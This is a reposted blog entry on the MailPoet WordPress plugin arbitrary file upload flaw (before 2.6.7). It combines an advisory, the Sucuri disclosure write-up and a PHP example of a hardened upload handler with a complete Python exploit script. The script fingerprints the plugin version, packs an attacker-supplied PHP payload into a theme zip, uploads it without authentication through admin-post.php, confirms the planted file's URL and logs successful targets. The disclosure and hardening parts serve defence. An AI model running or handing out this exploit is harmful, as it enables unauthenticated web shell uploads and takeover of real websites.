
WordPress MailPoet < 2.6.7 Plugin Arbitrary File Upload Vulnerability

Category: wordpress | Posted by: admin

Affected systems
WordPress MailPoet < 2.6.7

Vulnerability published: 2014-07-01
Vulnerability updated: 2014-07-01

Impact
A remote attacker can exploit this vulnerability to upload arbitrary files.

Attack prerequisites
The attacker must be able to reach WordPress MailPoet.

Vulnerability details
WordPress is a blogging platform written in PHP; users can host their own blog on any server that supports PHP and a MySQL database.
The WordPress MailPoet plugin's /wp-admin/admin-post.php script contains a security flaw that allows a remote attacker to upload arbitrary files by submitting a specially crafted request.

Vendor solution
WordPress MailPoet 2.6.7 fixes this vulnerability; users are advised to download the update:
https://wordpress.org/plugins/wysija-newsletters/

Reported by
Adriano Marcio Monteiro

Advisory link
http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html

Remote File Upload Vulnerability in WordPress MailPoet Plugin (wysija-newsletters)

Marc-Alexandre Montpas, from our research team, found a serious security vulnerability in the MailPoet WordPress plugin. This bug allows an attacker to upload any file remotely to the vulnerable website (i.e., no authentication is required).

This is a serious vulnerability. The MailPoet plugin (wysija-newsletters) is a very popular WordPress plugin (over 1,700,000 downloads). This vulnerability has been patched; if you run the WordPress MailPoet plugin, please upgrade ASAP!

Are you affected?

If you have this plugin activated on your website, the odds are not in your favor. An attacker can exploit this vulnerability without having any privileges/accounts on the target site. This is a major threat: it means every single website using it is vulnerable.

The only safe version is 2.6.7, which was just released a few hours ago (2014-Jul-01).

Why is it so dangerous?

This bug should be taken seriously: it gives a potential intruder the power to do anything he wants on his victim's website. It allows any PHP file to be uploaded. This can allow an attacker to use your website for phishing lures, sending SPAM, hosting malware, infecting other customers (on a shared server), and so on!

Technical Details

Our research team discovered this flaw a few weeks ago and immediately disclosed it to the MailPoet team. They responded very well and released a patch as quickly as possible.

Because of the nature of the vulnerability, specifically its severity, we will not be disclosing additional technical details. The basics of the vulnerability, however, are something all plugin developers should be mindful of: the vulnerability resides in the fact that the developers assumed that WordPress's "admin_init" hooks were only called when an administrator user visited a page inside /wp-admin/.

It is an easy mistake to make, and they used that hook (admin_init) to verify whether a specific user was allowed to upload files.

However, any call to /wp-admin/admin-post.php also executes this hook without requiring the user to be authenticated, thus making their theme upload functionality available to everybody.

Pro-tip: If you are a developer, never use admin_init() (or is_admin()) as an authentication method.
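The admin_init mistake described above, with the hardened pattern beside it, as an added illustrative example that is not MailPoet's code: handle_theme_upload(), the nonce action name and the menu slug are assumed placeholders, while add_action, admin_post_{action}, current_user_can, check_admin_referer, wp_die and ZipArchive are real WordPress/PHP APIs.

```php
<?php
// Added illustration, not MailPoet's code. handle_theme_upload() and the nonce
// action name are assumed placeholders; the WordPress APIs used are real.

/* MISTAKEN PATTERN (shown for contrast only, do not register it):
 * admin_init also fires for /wp-admin/admin-post.php, and that file does not
 * require a logged-in user, so reaching this hook proves nothing about the sender.
 *
 * add_action('admin_init', function () {
 *     if (isset($_POST['action']) && $_POST['action'] === 'themeupload') {
 *         handle_theme_upload($_FILES['my-theme']); // no capability or nonce check
 *     }
 * });
 */

// HARDENED PATTERN: register on admin_post_{action} (fires only for logged-in
// users; admin_post_nopriv_{action} is the unauthenticated variant), then check
// the capability and the nonce explicitly before touching the upload.
add_action('admin_post_themeupload', function () {
    // A logged-in subscriber is not an administrator: check the capability.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient privileges', 403);
    }
    // Reject forged cross-site requests: the form must carry a valid nonce
    // generated with wp_nonce_field('themeupload_nonce_action').
    check_admin_referer('themeupload_nonce_action');

    $file = isset($_FILES['my-theme']) ? $_FILES['my-theme'] : null;
    if ($file === null || $file['error'] !== UPLOAD_ERR_OK) {
        wp_die('Upload error', 400);
    }
    // Inspect the archive before extraction: no PHP-executable entries and no
    // path traversal, so a theme zip can never drop a script into uploads/.
    $zip = new ZipArchive();
    if ($zip->open($file['tmp_name']) !== true) {
        wp_die('Not a zip archive', 400);
    }
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        if (preg_match('/\.(php\d?|phtml|phar)$/i', $name) || strpos($name, '..') !== false) {
            $zip->close();
            wp_die('Archive contains a disallowed entry: ' . esc_html($name), 400);
        }
    }
    $zip->close();
    handle_theme_upload($file); // placeholder for the plugin's own extraction logic
    wp_safe_redirect(admin_url('admin.php?page=my_plugin_themes&uploaded=1'));
    exit;
});
```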

How should you protect yourself?

Again, update the plugin as soon as possible. Keeping WordPress and all plugins updated is the first step to keeping your sites secured.

Reposted from: http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html

————————————————————————————————————————————–

Exploit code, exploit.py:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from random import choice
import string
import sys
import re
from zipfile import ZipFile
from StringIO import StringIO
import requests
from colors import red, green, blue  # pip install ansicolors


def version_compare(v1, v2):
    def normalize(v):
        return [int(x) for x in re.sub(r'(\.0+)*$', '', v).split(".")]
    return cmp(normalize(v1), normalize(v2))


def create_zip_file(theme_name, payload_name, payload):
    files = {
        "%s/%s" % (theme_name, 'style.css'): '',
        "%s/%s" % (theme_name, payload_name): payload
    }
    zip_file = StringIO()
    with ZipFile(zip_file, 'w') as zip:
        for path in files:
            zip.writestr(path, files[path])
    zip_file.seek(0)
    return zip_file


def check(url):
    readme_url = "%s/wp-content/plugins/wysija-newsletters/readme.txt" % url
    res = requests.get(readme_url, timeout=15, verify=False)
    if res.status_code == 200:
        match = re.search("stable tag: (.*)[\r\n]", res.text, re.I)
        version = match.group(1)
        fun = green if version_compare(version, "2.6.7") < 0 else blue
        print fun("[?] found version: %s" % version)
        return version_compare(version, "2.6.7") < 0
    else:
        raise Exception("error getting version")


def exploit(url, payload_data):
    theme_name = '.tmp' # better to keep the chaos to one directory.
    payload_name = ''.join([choice(string.letters) for i in range(5)]) + ".php"
    zip_file = create_zip_file(theme_name, payload_name, payload_data)

    files = {'my-theme': ('%s.zip' % theme_name, zip_file, "application/x-zip-compressed")}
    data = {
        "action": "themeupload",
        "submitter": "Upload",
        "overwriteexistingtheme": "on"
    }

    target_url = "%s/wp-admin/admin-post.php?page=wysija_campaigns&action=themes" % url
    payload_url = "%s/%s/%s/%s" % (url, 'wp-content/uploads/wysija/themes', theme_name, payload_name)

    print blue("[?] attempting to upload zip (%s)..." % target_url)
    # Don't rely on checking response, have observed some strange behaviour even with successful upload
    requests.post(target_url, files=files, data=data, verify=False, timeout=15)

    print blue("[?] checking upload (%s)..." % payload_url)
    response = requests.head(payload_url, verify=False, timeout=15)
    if response.status_code == 200:
        print green("[+] found: %s" % payload_url)
        return payload_url
    else:
        raise Exception("upload failed.")


if __name__ == "__main__":

    if len(sys.argv) > 2:
        payload = open(sys.argv[1]).read()
        wp_url = sys.argv[2]
        try:
            if check(wp_url):
                res = exploit(wp_url, payload)
                if res:
                    with open("found-sija.log", "a") as log:
                        log.write("%s\n" % res)
        except Exception as e:
            print red("[!] %s - %s" % (wp_url, e))


Please credit when reposting: jinglingshu's blog » WordPress MailPoet < 2.6.7 Plugin Arbitrary File Upload Vulnerability


Latest reader comments (2)

  1. Hi, I tested this vulnerability locally and it reports that the upload failed. The version is 2.5.5; are there other factors involved?
    xiaoshu, 11 years ago (2014-10-16)